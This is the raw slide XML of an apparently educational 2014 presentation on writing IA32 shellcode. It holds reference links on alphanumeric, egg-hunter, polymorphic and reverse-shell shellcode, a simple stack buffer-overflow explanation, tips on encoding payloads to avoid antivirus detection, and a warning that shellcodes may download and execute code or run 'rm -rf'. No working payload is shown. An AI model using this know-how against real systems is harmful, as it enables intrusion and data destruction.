                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Building IA32 'Unicode-Proof' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shellcodes</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11"/>
              </a:rPr>
              <a:t>http://phrack.org/issues/61/11.html#article</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/Egg hunt/w32 SEH omelet</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12"/>
              </a:rPr>
              <a:t>http://skypher.com/...omelet_shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>What is polymorphic shell code</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13"/>
              </a:rPr>
              <a:t>https://www.sans.org/.../polymorphic_shell.php</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to reverse bind a shell with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>netcat</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14"/>
              </a:rPr>
              <a:t>http://morgawr.github.io/...with-netcat/</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Omlette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Egghunter</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Shellcode</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15"/>
              </a:rPr>
              <a:t>http://www.thegreycorner.com/...shellcode.html</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/Alphanumeric</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16"/>
              </a:rPr>
              <a:t>http://www.blackhatlibrary.net/Shellcode/Alphanumeric</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> writing toolkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>https://github.com/reyammer/shellnoob</a:t>
            </a:r>
            <a:endParaRPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Windows Syscall Shellcode: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>http://www.symantec.com/...windows-syscall-shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </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2387025"/>
            <a:ext cx="5486400" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0" smtClean="0"/>
              <a:t>Questions?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="3987225"/>
            <a:ext cx="6005945" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>ionut.popescu@outlook.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438400" y="533400"/>
            <a:ext cx="4800600" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Contact information</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496669"/>
            <a:ext cx="6705600" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Running shellcodes (DO NOT)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1611868"/>
            <a:ext cx="8382000" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DO NOT RUN on your machine! Use a testing purposes virtual machine!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="CodeBlocks shellcode.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="2209800"/>
            <a:ext cx="8113059" cy="3810000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6107668"/>
            <a:ext cx="7848600" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>It can contain: download and execute code, “rm –rf” ...</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304800"/>
            <a:ext cx="4876800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Simple BOF example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-12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143000"/>
            <a:ext cx="4272490" cy="243839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1143000"/>
            <a:ext cx="3038204" cy="4343400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="3810000"/>
            <a:ext cx="4876800" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>C program does not check for parameter length before copying data into “c” variable (it is a local variable so it is pushed on the stack).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>So it is possible to corrupt the stack and modify the “Return Address” in order to execute custom code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="5638800"/>
            <a:ext cx="7991204" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This code takes an argument from the command line and copies it to a local stack variable c. This works fine for command line arguments smaller than 12 characters. Any arguments larger than 11 characters long will result in corruption of the stack.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496669"/>
            <a:ext cx="4876800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="3600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Shellcode limitations</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1850172"/>
            <a:ext cx="7924800" cy="4093428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Limitations:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ro-RO" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2000" dirty="0" smtClean="0"/>
              <a:t> NULL free (may not contain a NULL character – most common)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Small size (may have a limited space to run)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Alphanumeric (may need to be alphanumeric)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Detection (may be detected by antivirus or IDS/IPS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Difficult (may really complicated to write your own shellcode)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="ro-RO" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ro-RO" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What to do:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="ro-RO" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Avoid \x00 instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ro-RO" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Egg hunter/omlette</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ro-RO" sz="2000" dirty="0" smtClean="0"/>
              <a:t> Encode shellcode (msfencode)</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496669"/>
            <a:ext cx="48768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Assembly introduction</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1621572"/>
            <a:ext cx="8305800" cy="4093428"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>	Processor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>understands only machine language instructions which are strings of 1s and 0s. However machine language is too obscure and complex for using in software development. So the low level assembly language is designed for a specific family of processors that represents various instructions in symbolic code and a more understandable form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>requires less memory and execution time; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> It allows hardware-specific complex jobs in an easier way; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> It is suitable for time-critical jobs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>; </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t> It is most suitable for writing interrupt service routines and other memory resident programs. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="163653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304800"/>
            <a:ext cx="4876800" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0">
                <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
                <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Processor registers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:latin typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:ea typeface="Arial Unicode MS" pitchFamily="34" charset="-128"/>
              <a:cs typeface="Arial Unicode MS" pitchFamily="34" charset="-12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143000"/>
            <a:ext cx="4953000" cy="5227473"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1098488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1563</TotalTime>
  <Words>3343</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>536</Paragraphs>
  <Slides>42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Foundry</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Office</dc:creator>
  <cp:lastModifiedBy>Ionut</cp:lastModifiedBy>
  <cp:revision>103</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-04-09T13:05:43Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-06-02T14:54:03Z</dcterms:modified>
</cp:coreProperties>
</file>